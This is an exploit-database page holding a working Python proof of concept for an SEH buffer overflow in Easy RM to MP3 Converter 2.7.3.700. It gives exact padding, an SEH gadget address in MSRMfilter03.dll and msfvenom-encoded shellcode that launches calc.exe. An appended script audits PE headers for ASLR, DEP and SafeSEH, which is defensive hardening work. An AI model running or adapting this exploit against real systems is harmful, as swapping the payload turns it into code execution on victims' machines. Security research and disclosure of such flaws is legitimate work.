Easy RM To MP3 Converter 2.7.3.700 Local Buffer Overflow ≈ Packet Storm


# Exploit Title: Easy RM to MP3 Converter 2.7.3.700 – ‘Input’ Local Buffer Overflow (SEH)
# Date: 2020-03-26
# Author: Felipe Winsnes
# Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe
# Version: 2.7.3.700
# Tested on: Windows 7 (x86)

# Proof of Concept:
# 1.- Run the Python script; it will create a new file 'poc.txt'
# 2.- Copy the content of the new file 'poc.txt' to the clipboard
# 3.- Open the application
# 4.- If the 'Preferences' window pops up, just click 'Cancel'
# 5.- Click 'Batch'
# 6.- Delete everything in the 'Input:' field and paste the clipboard content there
# 7.- Select OK
# 8.- Some Windows message boxes will pop up; click OK
# 9.- Profit

# Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/Easy-RM-to-MP3-Converter-2.7.3.700-Input/

import struct
import sys

# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread
# Payload size: 447 bytes

buf = b""
buf += b"\xdb\xc4\xd9\x74\x24\xf4\x58\x50\x59\x49\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37"
buf += b"\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
buf += b"\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
buf += b"\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x6b\x58\x4d\x52"
buf += b"\x55\x50\x73\x30\x67\x70\x55\x30\x6c\x49\x4a\x45\x65"
buf += b"\x61\x69\x50\x62\x44\x6c\x4b\x76\x30\x46\x50\x4e\x6b"
buf += b"\x76\x32\x46\x6c\x6c\x4b\x52\x72\x65\x44\x6e\x6b\x72"
buf += b"\x52\x74\x68\x44\x4f\x4f\x47\x73\x7a\x64\x66\x65\x61"
buf += b"\x49\x6f\x4e\x4c\x47\x4c\x50\x61\x71\x6c\x34\x42\x66"
buf += b"\x4c\x71\x30\x6b\x71\x58\x4f\x44\x4d\x46\x61\x68\x47"
buf += b"\x4a\x42\x6c\x32\x51\x42\x63\x67\x4c\x4b\x76\x32\x72"
buf += b"\x30\x4e\x6b\x33\x7a\x35\x6c\x4c\x4b\x50\x4c\x32\x31"
buf += b"\x31\x68\x59\x73\x53\x78\x55\x51\x6b\x61\x70\x51\x4e"
buf += b"\x6b\x70\x59\x47\x50\x35\x51\x68\x53\x6e\x6b\x51\x59"
buf += b"\x37\x68\x6a\x43\x45\x6a\x62\x69\x6c\x4b\x54\x74\x6c"
buf += b"\x4b\x55\x51\x4a\x76\x76\x51\x39\x6f\x6c\x6c\x6b\x71"
buf += b"\x4a\x6f\x36\x6d\x77\x71\x6a\x67\x77\x48\x69\x70\x33"
buf += b"\x45\x7a\x56\x64\x43\x61\x6d\x68\x78\x45\x6b\x53\x4d"
buf += b"\x66\x44\x53\x45\x69\x74\x70\x58\x4e\x6b\x76\x38\x74"
buf += b"\x64\x77\x71\x38\x53\x52\x46\x6e\x6b\x34\x4c\x72\x6b"
buf += b"\x6e\x6b\x56\x38\x45\x4c\x57\x71\x38\x53\x6c\x4b\x75"
buf += b"\x54\x6e\x6b\x76\x61\x4a\x70\x4e\x69\x67\x34\x44\x64"
buf += b"\x31\x34\x51\x4b\x73\x6b\x43\x51\x30\x59\x51\x4a\x53"
buf += b"\x61\x59\x6f\x49\x70\x31\x4f\x33\x6f\x63\x6a\x6c\x4b"
buf += b"\x57\x62\x68\x6b\x6c\x4d\x73\x6d\x42\x4a\x33\x31\x4c"
buf += b"\x4d\x4f\x75\x4e\x52\x73\x30\x35\x50\x47\x70\x66\x30"
buf += b"\x51\x78\x35\x61\x4e\x6b\x42\x4f\x6f\x77\x59\x6f\x58"
buf += b"\x55\x4f\x4b\x4d\x30\x35\x4d\x75\x7a\x65\x5a\x63\x58"
buf += b"\x49\x36\x4f\x65\x6d\x6d\x6d\x4d\x79\x6f\x79\x45\x45"
buf += b"\x6c\x77\x76\x33\x4c\x57\x7a\x4f\x70\x6b\x4b\x69\x70"
buf += b"\x74\x35\x57\x75\x6d\x6b\x33\x77\x65\x43\x43\x42\x62"
buf += b"\x4f\x32\x4a\x37\x70\x53\x63\x79\x6f\x6a\x75\x33\x53"
buf += b"\x35\x31\x72\x4c\x61\x73\x54\x6e\x61\x75\x61\x68\x75"
buf += b"\x35\x57\x70\x41\x41"

# Next SEH record and SEH handler overwrite (little-endian)
nseh = struct.pack("<I", 0x06710870)
seh = struct.pack("<I", 0x10025A2E)  # 0x10025a2e : pop ecx # pop esi # ret | ascii {PAGE_EXECUTE_READ} [MSRMfilter03.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Easy RM to MP3 Converter\MSRMfilter03.dll)

# Padding up to the SEH record, then a short INC ECX / DEC ECX sled before the payload
buffer = b"A" * 9008 + nseh + seh + b"\x41\x49" * 5 + buf + b"\xff" * 200

try:
    with open("poc.txt", "wb") as f:
        f.write(buffer)
    print("[+] The file has been created successfully!")

except OSError:
    print("[!] There has been an error while creating the file.")
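The mona line quoted next to the `seh` gadget above records why that module can be abused as an exception handler: it opts into neither ASLR nor SafeSEH. The following audit script is added here and is not part of the original exploit or of the vendor's software; it reads those mitigation flags straight from a PE header so a module can be checked for hardening without being loaded, and `build_test_pe` constructs a minimal header purely for demonstration.

```python
import struct

IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040  # ASLR opt-in
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100     # DEP opt-in
IMAGE_DLLCHARACTERISTICS_NO_SEH = 0x0400        # image declares it installs no SEH handlers
LOAD_CONFIG_INDEX = 10                          # data directory slot of IMAGE_LOAD_CONFIG_DIRECTORY


def audit_pe(data):
    """Return the exploit mitigations a PE image advertises in its headers."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    opt = e_lfanew + 4 + 20  # optional header follows the 20-byte COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:       # PE32
        dd_count_off, dd_off = opt + 92, opt + 96
    elif magic == 0x20B:     # PE32+
        dd_count_off, dd_off = opt + 108, opt + 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    dd_count = struct.unpack_from("<I", data, dd_count_off)[0]
    has_load_config = False
    if dd_count > LOAD_CONFIG_INDEX:
        va, size = struct.unpack_from("<II", data, dd_off + 8 * LOAD_CONFIG_INDEX)
        has_load_config = va != 0 and size != 0
    return {
        "aslr": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
        "dep": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
        "no_seh": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_NO_SEH),
        # No load config directory means no SafeSEH handler table at all; a full
        # check would also read SEHandlerCount from the structure it points to.
        "safeseh_possible": has_load_config,
    }


def build_test_pe(dll_chars, load_config_size):
    """Constructed minimal PE32 header (no sections), used only to exercise audit_pe."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)  # e_lfanew = 64
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x2102)
    opt = bytearray(224)                                # PE32 optional header size
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<H", opt, 70, dll_chars)
    struct.pack_into("<I", opt, 92, 16)                 # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * LOAD_CONFIG_INDEX,
                     0x1000 if load_config_size else 0, load_config_size)
    return dos + coff + bytes(opt)
```

To audit a real module, pass `open(path, "rb").read()` to `audit_pe`; a result with every flag False is the situation the mona comment describes and is a signal to rebuild the module with /DYNAMICBASE, /NXCOMPAT and /SAFESEH or to treat it as a hardening gap.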


